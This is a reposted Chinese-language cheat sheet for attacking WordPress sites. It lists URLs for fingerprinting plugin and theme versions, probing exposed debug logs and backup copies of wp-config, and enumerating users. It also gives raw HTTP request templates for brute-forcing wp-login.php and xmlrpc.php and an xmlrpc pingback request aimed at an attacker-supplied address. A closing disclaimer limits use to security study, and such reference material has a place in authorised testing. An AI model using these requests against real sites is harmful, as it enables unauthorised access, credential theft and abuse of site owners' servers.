干货 | Wordpress网站渗透方法指南
2022-9-15 09:43:5 Author: 黑白之道(查看原文) 阅读量:16 收藏

如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?

如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。

或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面

通过查看核心、插件和主题版本找到相关的CVE

https://target.com/feed https://target.com/?feed=rss2
https://target.com/wp-content/plugins/PLUGINNAME/readme.txthttps://target.com/wp-content/plugins/PLUGINNAME/readme.TXThttps://target.com/wp-content/plugins/PLUGINNAME/README.txthttps://target.com/wp-content/plugins/PLUGINNAME/README.TXT
https://target.com/wp-content/themes/THEMENAME/style.css https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)

如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用

http://target.com/wp-content/debug.log

查找备份文件 wp-config

http://target.com/.wp-config.php.swphttp://target.com/wp-config.inchttp://target.com/wp-config.oldhttp://target.com/wp-config.txthttp://target.com/wp-config.htmlhttp://target.com/wp-config.php.bakhttp://target.com/wp-config.php.disthttp://target.com/wp-config.php.inchttp://target.com/wp-config.php.oldhttp://target.com/wp-config.php.savehttp://target.com/wp-config.php.swphttp://target.com/wp-config.php.txthttp://target.com/wp-config.php.ziphttp://target.com/wp-config.php.htmlhttp://target.com/wp-config.php~
http://target.com/?author=1

或者

http://target.com/wp-json/wp/v2/users http://target.com/?rest_route=/wp/v2/users
POST /wp-login.php HTTP/1.1Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

或者

POST /xmlrpc.php HTTP/1.1Host: target.com
<?xml version="1.0" encoding="UTF-8"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>BRUTEFORCE_IN_HERE</value></param> </params> </methodCall>
POST /xmlrpc.php HTTP/1.1Host: target.com
<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://yourip:port</string></value></param><param><value><string>https://target.com></string></value></param></params></methodCall>
http://example.com/wp-login.php?action=register

文章来源:HACK学习呀

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650551083&idx=3&sn=50e9835c4c028cdfe4d99a7d510f5c89&chksm=83bd56cfb4cadfd985f3ee76adeba85aad1189235318e6880854e7e102594eeae8fef95c1cac#rd
如有侵权请联系:admin#unsafe.sh